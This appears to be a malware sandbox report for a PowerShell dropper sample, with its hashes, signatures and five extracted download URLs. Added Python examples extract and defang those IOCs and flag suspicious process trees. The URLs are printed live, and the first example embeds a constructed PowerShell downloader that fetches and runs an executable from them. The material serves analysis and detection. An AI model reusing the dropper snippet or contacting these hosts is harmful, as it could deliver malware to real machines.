General

  • Target: 89c008a6668cfced5c53f05f3e74b24e_JaffaCakes118
  • Size: 214KB
  • Sample: 240601-ja25qsdh7z
  • MD5: 89c008a6668cfced5c53f05f3e74b24e
  • SHA1: dd74ab9468c242b2e380a2a94d3990df84adba93
  • SHA256: 7c8c775210220e5ceee72c0c7459877dbcb72068aa6011fa6a29f5e3fda1b5f8
  • SHA512: fc87efa893d36b7285513840dd5a30988f0478078975f3bd38405d1f47b4ca8d1d8c2c8c1ceafbfe225f9998fdc38663c30ff607a475887e13f3118f72d764a1
  • SSDEEP: 3072:EEd93LpGo0aQLjaxQCF3tmKZQHkrL2VerQfcRoC:EEd2V6xQCpttQwLZQfI

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs
      exe.dropper  http://uat-essence.oablab.com/cEP88qz
      exe.dropper  http://34.207.179.222/GPc2ykD
      exe.dropper  http://204.236.197.55/ZmkN6EP
      exe.dropper  http://107.23.200.84/EmllsJND2W
      exe.dropper  http://radioviverbem.com.br/SZYTAZDa
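The five exe.dropper URLs above were pulled from a deobfuscated PowerShell script that this page does not reproduce. As an added example (not code from the report or from tria.ge), the Python below extracts, de-duplicates, classifies and defangs the URLs from a downloader of the usual "join with '@', split, try each in turn" shape. The script body in SAMPLE_PS1 is a constructed stand-in that carries the same five URLs; it is an assumption, not the sample's actual script.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed stand-in for a deobfuscated PowerShell downloader. It is NOT the
# script recovered from sample 240601-ja25qsdh7z (the report shows only the
# URLs it extracted); it follows the common "join URLs with '@', split, try
# each in turn" shape and carries the five exe.dropper URLs from the report.
SAMPLE_PS1 = r"""
$urls = 'http://uat-essence.oablab.com/cEP88qz@http://34.207.179.222/GPc2ykD@http://204.236.197.55/ZmkN6EP@http://107.23.200.84/EmllsJND2W@http://radioviverbem.com.br/SZYTAZDa'.Split('@')
$dst = $env:TEMP + '\' + (Get-Random) + '.exe'
foreach ($u in $urls) {
    try {
        (New-Object System.Net.WebClient).DownloadFile($u, $dst)
        if ((Get-Item $dst).Length -ge 40000) { Invoke-Item $dst; break }
    } catch {}
}
"""

# A URL ends at whitespace, a quote, the '@' join character or PowerShell syntax.
URL_RE = re.compile(r"""https?://[^\s'"@()<>;,]+""", re.IGNORECASE)


def extract_urls(script):
    """Return the unique URLs in first-seen order, which is the dropper's try order."""
    seen, urls = set(), []
    for match in URL_RE.finditer(script):
        url = match.group(0).rstrip(".")
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


def host_kind(url):
    """'ip' for a literal-IP host, 'domain' otherwise."""
    host = urlsplit(url).hostname or ""
    try:
        ipaddress.ip_address(host)
        return "ip"
    except ValueError:
        return "domain"


def defang(url):
    """Defang scheme and host only; the path is left intact so it stays searchable."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower().replace("http", "hxxp", 1)
    return "{}://{}{}".format(scheme, parts.netloc.replace(".", "[.]"), parts.path)


def iocs(script):
    """Build a small IOC table from the script: url, host, kind and defanged form."""
    return [
        {"url": u, "host": urlsplit(u).hostname, "kind": host_kind(u), "defanged": defang(u)}
        for u in extract_urls(script)
    ]


if __name__ == "__main__":
    for row in iocs(SAMPLE_PS1):
        print("{kind:6} {defanged}".format(**row))
```

Keeping the URLs in first-seen order matters: it is the order the dropper would contact them, so the first live host is the one most likely to appear in proxy logs. Three of the five hosts here are bare IPv4 literals, which is itself a useful hunting pivot (HTTP to an IP literal with a short random path).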

Targets

    • Target: 89c008a6668cfced5c53f05f3e74b24e_JaffaCakes118
    • Size: 214KB
    • MD5: 89c008a6668cfced5c53f05f3e74b24e
    • SHA1: dd74ab9468c242b2e380a2a94d3990df84adba93
    • SHA256: 7c8c775210220e5ceee72c0c7459877dbcb72068aa6011fa6a29f5e3fda1b5f8
    • SHA512: fc87efa893d36b7285513840dd5a30988f0478078975f3bd38405d1f47b4ca8d1d8c2c8c1ceafbfe225f9998fdc38663c30ff607a475887e13f3118f72d764a1
    • SSDEEP: 3072:EEd93LpGo0aQLjaxQCF3tmKZQHkrL2VerQfcRoC:EEd2V6xQCpttQwLZQfI

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory
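The first two signatures above are parent/child and network-by-image checks, the kind an analyst can re-run over any sandbox or EDR process tree. As an added example, not part of the report, the Python below implements both over a constructed process tree; the Office parent, the PIDs and the paths are assumptions for illustration, since the report names neither the parent image nor the tree for this sample.

```python
from collections import namedtuple

# Constructed sandbox process events: pid, parent pid, image path and whether the
# process made an outbound connection. This tree is illustrative only; the
# report for sample 240601-ja25qsdh7z does not show the parent image or the tree.
Proc = namedtuple("Proc", "pid ppid image net")

EVENTS = [
    Proc(1, 0, r"C:\Windows\explorer.exe", False),
    Proc(2, 1, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", False),
    Proc(3, 2, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", True),
    Proc(4, 3, r"C:\Users\Admin\AppData\Local\Temp\427.exe", True),
    Proc(5, 1, r"C:\Windows\System32\svchost.exe", True),
]

# Document handlers that have no business launching interpreters or shells.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# Children that, under a document parent, point at macro or exploit code running.
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Script hosts whose outbound traffic is flagged outright, the same idea as the
# sandbox's "blocklisted process makes network request" signature.
NETWORK_BLOCKLIST = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def image_name(path):
    """Lower-cased file name of an image path, e.g. 'winword.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


def unexpected_children(events):
    """(parent_pid, child_pid) pairs where a document handler spawned an interpreter."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for child in events:
        parent = by_pid.get(child.ppid)
        if parent is None:
            continue
        if image_name(parent.image) in DOCUMENT_PARENTS and image_name(child.image) in SUSPICIOUS_CHILDREN:
            hits.append((parent.pid, child.pid))
    return hits


def blocklisted_network(events):
    """PIDs of blocklisted script hosts that made a network request."""
    return [e.pid for e in events if e.net and image_name(e.image) in NETWORK_BLOCKLIST]


def ancestry(events, pid):
    """Image names from the root of the tree down to pid, for the analyst's timeline."""
    by_pid = {e.pid: e for e in events}
    chain, visited = [], set()
    while pid in by_pid and pid not in visited:   # visited guards against a cyclic ppid
        visited.add(pid)
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))


if __name__ == "__main__":
    by_pid = {e.pid: e for e in EVENTS}
    for parent, child in unexpected_children(EVENTS):
        print("unexpected child:", " -> ".join(ancestry(EVENTS, child)))
    for pid in blocklisted_network(EVENTS):
        print("blocklisted network:", image_name(by_pid[pid].image))
```

The parent/child check is intentionally narrow (document handler directly spawning an interpreter) so it stays high-precision; svchost.exe making a connection is not flagged, only the script host is. Widening DOCUMENT_PARENTS or SUSPICIOUS_CHILDREN is where tuning for a given environment happens.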

MITRE ATT&CK Enterprise v15

Tasks